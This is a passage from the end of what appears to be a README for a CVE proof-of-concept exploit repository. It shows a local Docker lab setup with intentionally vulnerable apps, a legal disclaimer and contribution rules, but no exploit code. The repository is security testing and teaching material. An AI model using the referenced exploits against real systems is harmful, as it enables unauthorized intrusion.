docker network create --subnet=172.28.0.0/16 cve-lab 2>/dev/null
# Launch vulnerable targets
docker-compose up -d
echo "[+] Lab environment running on:"
echo " DVWA: http://localhost:80"
echo " Juice Shop: http://localhost:3000"
echo " Test Web: http://localhost:5000"
echo ""
echo "[*] Run PoCs against these local targets only"
echo "[*] Stop with: docker-compose down"
```
---
## Disclaimer
**This repository is for authorized security testing and educational purposes only.**
- Every PoC has been tested in isolated lab environments only
- **Never** use these exploits against systems you do not own or have explicit written permission to test
- Unauthorized access to computer systems is illegal under the CFAA, CMA, and equivalent laws worldwide
- The author assumes no responsibility for misuse of these materials
- Always follow responsible disclosure practices when reporting vulnerabilities
By using this repository, you agree to only employ these techniques in legal, authorized contexts.
---
## License
MIT License. See [LICENSE](LICENSE).
---
## Contributing
Contributions welcome. When submitting a new CVE PoC:
1. Include all required fields (description, versions, impact, PoC, remediation)
2. Test the PoC in an isolated environment
3. Do not include payloads targeting real-world production systems
4. Reference official advisories and patches
---
Curated by ykrishhh – Security Researcher & Developer